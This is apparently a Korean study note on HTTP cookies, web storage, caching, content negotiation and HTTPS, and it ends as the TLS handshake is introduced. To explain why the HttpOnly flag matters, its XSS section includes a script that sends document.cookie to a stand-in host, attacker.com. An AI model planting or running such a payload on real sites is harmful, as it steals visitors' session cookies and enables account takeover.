응용계층 - HTTP의 응용(쿠키, 캐시, 콘텐츠 협상, 인증, 보안)

쿠키

앞서 HTTP는 스테이트리스 프로토콜이라고 했었다. 그렇기에 같은 클라이언트에서 요청을 두 번 보내도 별개의 요청으로 판단한다. 그런데 클라이언트의 상태를 기억해야 할 때가 있다. 예를 들어 사용자가 특정 웹사이트에서 다크모드를 켰다고 가정하자. 이후 이 사용자가 다시 웹사이트에 접속하면 다크모드로 보여지게 된다. 이런 정보는 서버측에서 Set-Cookie: mode=dark 헤더를 전달하고, 브라우저는 이를 받아 저장해둔다.

이후 같은 서버로 요청을 보낼 때 받았던 쿠키값을 전달한다. 쿠키값이 여러개이면 세미콜론으로 나누어 전달한다. (Cookie : mode=dark; message=test; . . .)

위에서 봤듯이 쿠키는 이름=값 형식으로 저장되는데, 그 외에도 도메인과 경로, 유효기간과 같은 속성을 설정할 수 있다.

아래와 같이 설정한다. Expires는 만료 시간을 명시하는 것이고, Max-Age는 초 단위로 유효기간을 설정하는 것이다.

그 외에도 HttpOnly(Http로만 접근 가능), Secure(HTTPS로만 쿠키 송수신)등의 보안 관련 옵션들도 있다. 쿠키에 HttpOnly 설정을 하면 크롬 개발자모드로도 볼 수 없게 되는데(Http로 조회하는 것이 아니니까) 자바스크립트로의 접근도 차단되기 때문에 XSS와 같은 공격에서 쿠키 탈취를 막을 수 있다.

XSS란?
악성 스크립트가 웹 사이트에 삽입되는 것이다. 예를 들어 아래와 같은 스크립트가 웹 사이트에 삽입되었다고 치자.

<script>
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>​

 

그러면 위 스크립트가 삽입된 웹 사이트에 접속할 때 마다 쿠키값은 해커의 서버로 전송된다. 그런데 HttpOnly설정을 하면 자바스크립트로 쿠키에 접근할 수 없기 때문에 위와 같은 공격에서 안전해지는 것이다.

 

웹 스토리지 : 로컬 스토리지 vs 세션 스토리지

쿠키와는 비슷하지만 조금 다른 개념으로 웹 스토리지라는 것이 있다. 웹 스토리지는 웹 브라우저 내의 저장 공간으로, 일반적으로 쿠키보다 더 큰 데이터를 저장할 수 있다. 쿠키는 개당 약 4KB의 데이터를 저장할 수 있는데 웹 스토리지는 5MB까지 저장할 수 있다. 앞서 봤듯이 쿠키는 서버에 자동으로 전송되기 때문에 큰 데이터를 담을 수 없다.

이 웹 스토리지는 로컬 스토리지와 세션 스토리지로 나뉜다. 로컬 스토리지는 별도로 삭제하지 않는 이상 영구적으로 저장이 가능하고, 세션 스토리지는 브라우저가 열려있는 동안 정보가 유지된다.

 

캐시

캐시는 응답받은 자원의 사본을 임시로 저장해두는 것이다. 예를 들어 사진 A가 자주 조회된다면 이를 클라이언트(브라우저)나 캐시 서버에 저장해두고, A를 요청할 때 마다 캐시해둔 곳에서 불러오면 더욱 빠른 응답을 할 수 있다. 그런데 문제는 캐시와 원본이 달라지는 경우이다. 그렇기에 캐시에는 대부분 유효기간이 설정되어있다. 이 유효기간은 쿠키와 같이 Expires를 통해 명시적으로 만료 날짜를 부여할 수도 있고 Max-Age값을 통해 초 단위로 설정할 수도 있다.

이렇게 설정한 유효기간이 만료되면 원본이 변경된 적이 있는지를 확인한다. 원본 변경 여부는 날짜 또는 엔티티 태그라는 것을 이용해 확인한다. 단순하게 마지막 수정일이 서로 일치하거나, 엔티티 태그가 같다면 원본이 수정된 적이 없는 것이다. 그러면 캐시된 값을 사용해도 된다. 만약 원본이 변경되었다는 것을 확인했다면 캐시를 갱신해주면 된다.

클라이언트가 원본이 변경되었는지 질의할 때는 헤더의 If-Modified-Since(날짜) 또는 If-None-Match(엔티티 태그)값을 활용한다. 서버는 이를 보고 원본이 변경되었는지 확인하고 변경되었을 경우 200과 함께 새로운 원본을 리턴한다. 그리고 변경되지 않았으면 304(Not Modified)코드와 자원의 마지막 변경 시점을 리턴한다. 원본이 사라져있는 경우도 있을 수 있다. 이 경우엔 404(Not Found)를 리턴한다.

 

콘텐츠 협상

콘텐츠 협상은 클라이언트가 가장 선호하는 방식의 자원을 제공하는 것이다. 대표적인 예로 인코딩이 있다.

클라이언트는 Accept ~~~ 헤더를 통해 선호하는 미디어타입, 언어, 인코딩방식 등을 전달한다. 이때 q(Quality Value)값으로 선호도를 표기하기도 한다. (ex)한국어를 1만큼, 영어를 0.9만큼 선호한다.

 

보안 : SSL/TLS와 HTTPS

HTTPS는 HTTP+SSL or TLS 이다. SSL과 TLS는 모두 인증, 암호화를 수행하는 프로토콜이며 TLS는 SSL을 계승한 프로토콜을 말한다. SSL과 TLS는 각각 여러 버전이 있지만 오늘날은 TLS 1.2와 TLS 1.3을 주로 사용한다.

TLS 1.3기분 HTTP 메시지는 3 way handshake → TLS handshake → 메시지 송수신 순으로 처리된다. TLS handshake 과정은 아래와 같다.